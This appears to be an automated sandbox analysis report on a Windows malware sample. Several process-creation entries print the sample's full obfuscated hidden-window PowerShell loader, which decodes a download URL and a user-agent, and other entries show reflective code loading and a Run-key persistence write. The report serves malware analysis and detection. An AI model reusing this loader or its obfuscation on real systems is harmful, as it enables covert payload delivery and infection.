Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.*j[P source: msiexec.exe, 00000010.00000002.1958810388.0000000002F77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Automation.pdb source: powershell.exe, 00000005.00000002.1669372747.0000000007535000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb source: powershell.exe, 00000005.00000002.1677454794.00000000086D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*tK source: msiexec.exe, 00000010.00000002.1958810388.0000000002F77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\<.oeaccount source: msiexec.exe, 00000010.00000002.1958810388.0000000002F5A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.Core.pdb source: powershell.exe, 00000005.00000002.1677454794.00000000086D0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: Yara match File source: 00000005.00000002.1679189709.000000000A606000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1678908955.0000000008980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1657579338.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1476663613.0000013F90071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Kommenterendes)$GLobaL:paTeNTeRINgeRNES = [sYSTeM.text.enCODIng]::aSCII.GEtStRInG($fALDeRebstrAPpEs)$GLoBaL:eUryAleaN=$patenTERingerneS.subSTRIng($ForVRreLsER,$syNClASTic)<#Trisubsti
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((amorbuer $Formandsposts $Loydie), (Pyrotechny146 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Bedeslagenes = [AppDomain]::CurrentDomain.GetAssemblies()$
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Brochering)), $Variotinted119).DefineDynamicModule($Trisaccharose, $false).DefineType($Menusektioners, $Remaker, [System.MulticastDele
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Kommenterendes)$GLobaL:paTeNTeRINgeRNES = [sYSTeM.text.enCODIng]::aSCII.GEtStRInG($fALDeRebstrAPpEs)$GLoBaL:eUryAleaN=$patenTERingerneS.subSTRIng($ForVRreLsER,$syNClASTic)<#Trisubsti
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Met
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 15_2_004044A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887AF09CA push E85E1B5Dh; ret 3_2_00007FF887AF09F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887AF7962 push ebx; retf 3_2_00007FF887AF796A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044693D push ecx; ret 15_2_0044694D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044DB70 push eax; ret 15_2_0044DB84
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044DB70 push eax; ret 15_2_0044DBAC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00451D54 push eax; ret 15_2_00451D61
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0044B090 push eax; ret 16_2_0044B0A4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_0044B090 push eax; ret 16_2_0044B0CC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00451D34 push eax; ret 16_2_00451D41
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00444E71 push ecx; ret 16_2_00444E81
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00414060 push eax; ret 17_2_00414074
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00414060 push eax; ret 17_2_0041409C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00414039 push ecx; ret 17_2_00414049
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_004164EB push 0000006Ah; retf 17_2_004165C4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00416553 push 0000006Ah; retf 17_2_004165C4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00416555 push 0000006Ah; retf 17_2_004165C4
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 16_2_004047CB
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
